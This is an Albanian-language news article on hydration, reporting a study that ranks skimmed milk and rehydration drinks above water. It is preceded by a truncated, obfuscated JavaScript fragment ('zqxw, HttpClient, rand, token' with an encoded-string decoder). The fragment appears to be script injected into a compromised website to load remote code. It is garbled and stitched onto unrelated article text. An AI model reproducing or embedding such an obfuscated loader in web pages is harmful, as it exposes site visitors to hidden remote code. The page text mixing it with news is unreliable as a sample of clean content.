;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Në fakt uji nuk është pija më hidratuese!

By

Gjithmonë është thënë se pirja e ujit është mënyra më e mirë për të hidratuar trupin e njeriut. Përkatësisht, uji është i pranishëm në qelizat, indet dhe vetë organet. Përveç kësaj, gjaku i njeriut përbëhet nga 80 deri në 90 për qind ujë. Gjithashtu, kemi dëgjuar se është e rëndësishme të pini rreth dy litra ujë në ditë, sepse ndihmon në rregullimin e temperaturës së trupit, përmirësimin e funksionit njohës dhe tretjen e duhur.

 Edhe pse uji është një pije që përthithet më lehtë nga trupi sepse nuk ka kalori apo sheqer, tani shkenca ka zbuluar se ka pije që hidratohen më mirë.

 American Journal of Clinical Nutrition publikoi rezultatet e një studimi në të cilin thuhet se, “ndonëse uji është motori i trupit, është më mirë të hidratoni trupin me lëngje të tjera”. Ata deklarojnë se ka pije që kanë lëndë ushqyese që mund të ndikojnë në shpejtësinë e zbrazjes së stomakut dhe lëngun që trupi mban. Prandaj, është e rëndësishme të dini se pijet që kanë më shumë yndyrë, proteina, sheqer ose elektrolite ju mbajnë të hidratuar më gjatë, transmeton Klankosova.tv.

 Gjëja më befasuese është se qumështi i skremuar është pija më e mirë për zgjatjen e hidratimit, që është për shkak të proporcionit të laktozës, yndyrës dhe proteinave, që do të thotë se ky lëng qëndron në stomak për një kohë më të gjatë, përcjell Index.hr, transmeton Klankosova.tv. Një faktor tjetër i favorshëm është natriumi në qumështin e skremuar, i cili shkakton zbrazje më të ngadaltë të stomakut dhe kështu e mban trupin të hidratuar.

 Në vend të dytë renditen pijet rehidratuese që përdoren për trajtimin e diarresë, ndërsa në vendin e tretë është qumështi me yndyrë. Pasuar nga lëngu i portokallit, çaji i ftohtë, çaji, pijet sportive izotonike, uji, uji mineral, birra dhe kafeja, transmeton Klankosova.tv.

Artikuj të ngjashëm